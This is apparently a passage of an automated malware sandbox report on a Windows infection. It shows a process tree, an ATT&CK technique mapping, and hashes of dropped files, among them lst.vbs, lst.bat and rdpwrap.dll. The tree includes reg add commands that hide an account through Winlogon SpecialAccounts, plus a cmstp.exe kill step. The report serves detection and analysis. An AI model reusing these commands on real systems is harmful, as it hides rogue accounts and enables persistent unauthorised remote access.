PID:1188

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\system32\taskeng.exe
taskeng.exe {0A7BB5C7-B288-40DD-830F-55443A25FF75} S-1-5-21-3846991908-3261386348-1409841751-1000:VQVVOAJK\Admin:Interactive:[1]
1⤵
PID:628

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs"
2⤵
PID:272

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.bat
3⤵
PID:1528

C:\Windows\system32\reg.exe
reg add "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SysWOW64 /t REG_DWORD /d 0 /f
4⤵
PID:2020

C:\Windows\system32\reg.exe
reg add "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts" /v SysWOW64 /t REG_DWORD /d 0 /f
4⤵
PID:1016

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SysWOW64 /t REG_DWORD /d 0 /f
4⤵
PID:1732

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\Services\rdpwrap.dll
MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
C:\Program Files\Common Files\Services\rdpwrap.ini
MD5
214a63289660657dcd4824e206934256

SHA1
6a2d9e5fa9a031d46abe368d0f37c323b7fdc8d4

SHA256
70a86b3d8e18e3bec2b33874a84bf09155b896f89dc7088b8a1a8324996eb0ae

SHA512
34b09c84d5d7690d5012048f3ddfed4421484f0f05bd9716d3ffc05e595c20e9cb7fabea0f530b81ded668f874c7fef686afd3f0d0559c6e7e1576fecd719683

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.bat
MD5
5c33afac78dc3bb35f1d2f48e23456ce

SHA1
79081c8ed707cf527e14d7b934b83e62a933b0d8

SHA256
1d1f284c9317e4e268e7ea4b129f557af90a2cc1861ee62d1b988636856aa552

SHA512
ab273abc5e4a320daf79f166286687574b9a5c1cce5e31f24e2d97ab8ccf98a18e41f64bcd6af8efbe7a7268681a94b4d6accad13dd3b9e56ba8133f61da97c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs
MD5
4c9bf0719250bbbf5a44ad421e0c00f4

SHA1
dd686bfa711732d30611b0bdcc1f270ba3828180

SHA256
12bc4a0eae0555b0850cb271bae5cc660bf7551750e3c7ae9a0fb7843e0d302f

SHA512
d5dce8489a39c0e44c6f77f154f0caa3ce51ffe345d0862ccdf594711ea2b45c4aa5fe61a4a50ba5de2612fa7752971186281426f8a841d8e03b24cb895b85d0

Download Submit
C:\Users\Public\j4dsucc1.exe
MD5
bb9c7628c643c5232a64a45b8814bff2

SHA1
12eded5c10f86eb3050a8b4f0ae2b17de58c70a9

SHA256
c7667ceb0efa8aa8b7bd763d779424b5445ca9f56b9e526a395f4044ba4acc69

SHA512
85ea8886b72137c18c442f6239211cb7a27da9fdfeba43bf848fd72ece8b37424f2c3c651aae560f5e6381fe05483fbe838a92277b17267aae49bd15e999b287

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Public\552pku1a.inf
MD5
17f41655ae1f701adfddafa57d304a28

SHA1
5ee5f8fc880fc6b2d160aecd8c38d1377f3ec431

SHA256
80d0a556bdc500f1bdc9443af7b197fc3df06a5c0a2482f10d70f5b91524985d

SHA512
0c78565f97dce119990de9bcf7df087948f9a2e6a20483097c2e6394257ed3a5c5544d2bf0125a2d50881d224e37a757a443f97fb3de3754f825a7347c9b9675

Download Submit
\??\c:\Users\Public\j4dsucc1.exe
MD5
bb9c7628c643c5232a64a45b8814bff2

SHA1
12eded5c10f86eb3050a8b4f0ae2b17de58c70a9

SHA256
c7667ceb0efa8aa8b7bd763d779424b5445ca9f56b9e526a395f4044ba4acc69

SHA512
85ea8886b72137c18c442f6239211cb7a27da9fdfeba43bf848fd72ece8b37424f2c3c651aae560f5e6381fe05483fbe838a92277b17267aae49bd15e999b287

Download Submit
memory/820-58-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp

Filesize
8KB

Download
memory/968-64-0x0000000075AB1000-0x0000000075AB3000-memory.dmp

Filesize
8KB

Download
memory/1688-59-0x0000000002446000-0x0000000002465000-memory.dmp

Filesize
124KB

Download
memory/1688-55-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmp

Filesize
4KB

Download
memory/1688-54-0x000007FEF2EA0000-0x000007FEF3F36000-memory.dmp

Filesize
16.6MB

Download
memory/1688-56-0x0000000002440000-0x0000000002442000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads